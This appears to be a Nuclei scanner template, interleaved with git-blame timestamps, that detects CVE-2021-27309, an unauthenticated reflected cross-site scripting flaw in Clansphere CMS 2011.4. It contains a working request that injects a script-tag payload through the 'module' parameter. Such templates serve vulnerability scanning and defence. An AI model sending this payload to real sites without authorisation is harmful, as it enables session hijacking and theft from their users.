2022-06-17 06:01:40 +00:00
id : CVE-2021-27309
info :
2022-08-29 13:55:23 +00:00
name : Clansphere CMS 2011.4 - Cross-Site Scripting
2022-06-17 06:01:40 +00:00
author : edoardottt
severity : medium
2022-06-21 03:45:58 +00:00
description : |
2022-08-29 13:55:23 +00:00
Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to a patched version of Clansphere CMS or apply the vendor-supplied patch to fix the XSS vulnerability.
2022-06-21 03:45:58 +00:00
reference :
- https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-27309
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-06-17 06:01:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-27309
cwe-id : CWE-79
2023-12-12 11:07:52 +00:00
epss-score : 0.00106
2024-01-29 17:11:14 +00:00
epss-percentile : 0.42925
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:*
2022-06-21 03:46:45 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : csphere
product : clansphere
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,clansphere,xss,cms,unauth,csphere
2022-06-17 06:01:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-06-17 06:01:40 +00:00
- method : GET
path :
2022-06-21 03:45:58 +00:00
- "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"
2022-06-17 06:01:40 +00:00
matchers-condition : and
matchers :
- type : word
2022-06-21 03:45:58 +00:00
part : body
2022-06-17 06:01:40 +00:00
words :
2022-06-21 03:45:58 +00:00
- '"></script><script>alert(document.domain)</script>.php'
2022-06-17 06:01:40 +00:00
- type : word
2022-06-21 03:45:58 +00:00
part : header
2022-06-17 06:01:40 +00:00
words :
2022-06-21 03:45:58 +00:00
- "text/html"
- type : status
status :
- 200
2024-01-30 06:46:18 +00:00
# digest: 4a0a0047304502205b00fbd835bf6365747ca455e3baf330c2bf123afee61ae0f8981aa1dab11857022100ef6c2c713eaa742043860a3f65409516d36de9988dd7053879e71c4db8f4a572:922c64590222798bb761d5b6d8e72950